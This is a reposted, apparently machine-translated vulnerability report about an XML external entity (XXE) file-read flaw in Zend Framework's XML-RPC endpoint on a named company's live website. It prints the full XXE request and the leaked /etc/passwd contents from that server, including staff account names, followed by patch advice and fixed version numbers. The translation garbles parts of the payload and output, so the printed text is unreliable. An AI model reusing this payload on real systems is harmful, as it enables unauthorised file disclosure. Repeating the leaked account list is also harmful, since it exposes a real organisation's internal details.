Arbitrary File Read vulnerability in Etam zend framework

Source: Internet
Author: User
Tags gopher

URL: http://www.etam.com.cn/api/xmlrpc
Post Data:
<? Xml version = "1.0"?>
<! DOCTYPE foo [
<! ELEMENT methodName ANY>
<! ENTITY xxe SYSTEM "file: // etc/passwd">]>
<MethodCall>
<MethodName> & xxe; </methodName>
</MethodCall>
Vulnerability proof: passwd file content:
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpc: x: 32: 32: Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
Abrt: x: 173: 173:/etc/abrt:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Saslauth: x: 499: 76: & quot; Saslauthd user & quot;:/var/empty/saslauth:/sbin/nologin
Postfix: x: 89: 89:/var/spool/postfix:/sbin/nologin
Qpidd: x: 498: 499: Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Tomcat: x: 91: 91: Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Tcpdump: x: 72: 72: // sbin/nologin
Oprofile: x: 16: 16: Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
Memcached: x: 497: 496: Memcached daemon:/var/run/memcached:/sbin/nologin
Nginx: x: 496: 495: Nginx web server:/var/lib/nginx:/sbin/nologin
ETapp001: x: 500: 0:/home/ETapp001:/bin/bash
Itochu: x: 501: 501:/var/www/etam/etam.com.cn/itochu:/sbin/nologin
Torry: x: 502: 502:/home/torry:/sbin/nologin
Etamftp: x: 503: 503:/var/www/etam/etam.com.cn/newsletter:/sbin/nologin
Etamftp1: x: 504: 503:/var/www/etam/etam.com.cn/var:/sbin/nologin
Dailycheck: x: 505: 505:/home/dailycheck:/bin/bash
Tom01: x: 506: 506:/home/tom01:/bin/bash
Wangliang01: x: 507: 507:/home/wangliang01:/bin/bash
Hanson01: x: 508: 508:/home/hanson01:/bin/bash
Johny01: x: 509: 509:/home/johny01:/bin/bash
Lilei01: x: 510: 510:/home/lilei01:/bin/bash
William 01: x: 511: 511:/home/William 01:/bin/bash
Ellie01: x: 512: 512:/home/ellie01:/bin/bash
Sam01: x: 513: 513:/home/sam01:/bin/bash
Jack01: x: 514: 514:/home/jack01:/bin/bash
Eric01: x: 515: 515:/home/eric01:/bin/bash
Torry01: x: 516: 516:/home/torry01:/bin/bash
Nagios: x: 517: 517:/home/nagios:/bin/bash

 
 

Solution:

1. Check the underlying xml parsing library used. external entity Parsing is prohibited by default;
2. Update the patch:
Versions with vulnerabilities: 1.11.11
1.12.0 RC1
2.0.0 beta4
Earlier versions
Vulnerability fix version: 1.11.12
1.12.0 RC2
2.0.0 beta5



Upgrade based on the corresponding version

Upgrade Address link: http://framework.zend.com/
Http://framework.zend.com/download/latest
Http://packages.zendframework.com/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.